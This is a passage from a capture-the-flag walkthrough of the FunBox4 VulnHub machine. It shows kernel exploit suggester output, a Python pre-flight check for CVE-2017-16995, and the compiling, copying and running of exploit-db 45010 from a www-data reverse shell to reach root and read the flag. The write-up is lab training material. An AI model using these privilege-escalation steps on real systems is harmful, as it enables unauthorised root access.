   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

thomas@funbox4:~$
Plenty of candidates. Pick one whose tags match this system (Ubuntu 16.04, kernel 4.4.0): CVE-2017-16995 (eBPF verifier, exploit-db 45010). The tags are a heuristic only; its 16.04 entry lists 4.8 and 4.10 kernels, but the bug is present on this 4.4.0-21 kernel too, and the two preconditions the suggester prints (CONFIG_BPF_SYSCALL set, kernel.unprivileged_bpf_disabled != 1) are what actually decide whether it can work.
Fetch the exploit locally:
☁ FunBox4 searchsploit -m 45010
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
File Type: C source, ASCII text

Copied to: /home/kali/vulnhub/FunBox/FunBox4/45010.c
It is a C source file and the target has no compiler, so compile it locally and copy the binary over. If a binary built on a newer Kali fails on the target with a missing GLIBC version error, build it statically (gcc -static) or on a system with a matching libc.
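Before compiling and shipping 45010 it is worth confirming the preconditions the suggester printed for CVE-2017-16995 (CONFIG_BPF_SYSCALL set, kernel.unprivileged_bpf_disabled != 1) together with the kernel range from the exploit-db title (< 4.13.9); a kernel exploit that cannot work is a crash risk for no gain. The script below is an added example, not part of the writeup or of linux-exploit-suggester. On the target it reads /boot/config-$(uname -r) and /proc/sys/kernel/unprivileged_bpf_disabled; its check function takes plain strings so it can be exercised offline with constructed inputs. The /boot/config-<release> path is the Ubuntu convention and an assumption for other distributions.

```python
"""Pre-flight check for CVE-2017-16995 (eBPF verifier) before shipping exploit 45010.

Added example; not part of the original writeup or of linux-exploit-suggester.
It encodes the two conditions LES printed for this CVE
(CONFIG_BPF_SYSCALL set and kernel.unprivileged_bpf_disabled != 1) and the
kernel range in the exploit-db title ("Linux Kernel < 4.13.9").
"""
import os
import re
import sys
from typing import List, Optional, Tuple

MAX_VULNERABLE = (4, 13, 9)   # exploit-db 45010: "Linux Kernel < 4.13.9"


def parse_release(release: str) -> Tuple[int, int, int]:
    """'4.4.0-21-generic' -> (4, 4, 0); ValueError on anything else."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"cannot parse kernel release {release!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def bpf_preflight(release: str, config_text: Optional[str], sysctl_value: Optional[str]) -> List[str]:
    """Return the list of blockers found; an empty list means the exploit is worth trying."""
    blockers: List[str] = []
    if parse_release(release) >= MAX_VULNERABLE:
        blockers.append(f"kernel {release} is not < 4.13.9")
    if config_text is None:
        blockers.append("kernel config not readable; cannot confirm CONFIG_BPF_SYSCALL")
    elif not re.search(r"^CONFIG_BPF_SYSCALL=y$", config_text, re.M):
        blockers.append("CONFIG_BPF_SYSCALL is not set")
    if sysctl_value is None:
        blockers.append("kernel.unprivileged_bpf_disabled not readable")
    elif sysctl_value.strip() == "1":
        blockers.append("kernel.unprivileged_bpf_disabled=1: bpf() is blocked for unprivileged users")
    return blockers


def _read(path: str) -> Optional[str]:
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def read_live() -> Tuple[str, Optional[str], Optional[str]]:
    """Collect the inputs from the running system (Ubuntu /boot/config-<release> path assumed)."""
    release = os.uname().release
    return release, _read(f"/boot/config-{release}"), _read("/proc/sys/kernel/unprivileged_bpf_disabled")


if __name__ == "__main__":
    found = bpf_preflight(*read_live())
    for b in found:
        print("[-]", b)
    if not found:
        print("[+] preconditions for CVE-2017-16995 look satisfied; try the exploit")
    sys.exit(1 if found else 0)
```

Copy it to the target alongside the exploit and run it as the user that will run the exploit (here www-data in the reverse shell); the sysctl is what blocks unprivileged bpf(), so a check run as root would not be representative.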
☁ FunBox4 gcc 45010.c -o exp
☁ FunBox4 scp exp thomas@192.168.9.43:/tmp/
thomas@192.168.9.43's password:
exp                                           100%   21KB  22.6MB/s   00:00
☁ FunBox4
Run it on the target. The shell obtained through SSH is rbash and restricted, so run the binary from the reverse shell (www-data) instead; /tmp is world-writable, so the file copied in as thomas is reachable from there:
www-data@funbox4:/tmp$ ./exp
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003baee900
[*] Leaking sock struct from ffff88000f2c2780
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880008cb6540
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880008cb6540
[*] credentials patched, launching shell...
#
Privilege escalation succeeded. Find flag.txt:
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
flag.txt
# cat flag.txt
(figlet "Funbox CTF" banner, garbled in this copy)
Well done !
Made with ❤ by @0815R2d2 !
I look forward to see this screenshot on twitter ;-)
#
Summary: information gathering and a case-sensitive directory scan reveal the hidden directory; its unrestricted file upload gives a web shell; a hint in the user's home directory turns an impractical brute force into a short one; and local enumeration points to the kernel vulnerability used for privilege escalation.
Techniques covered: host discovery, port scanning, directory scanning, file upload vulnerability, use of linux-exploit-suggester.sh and linpeas.sh, kernel privilege escalation via CVE-2017-16995.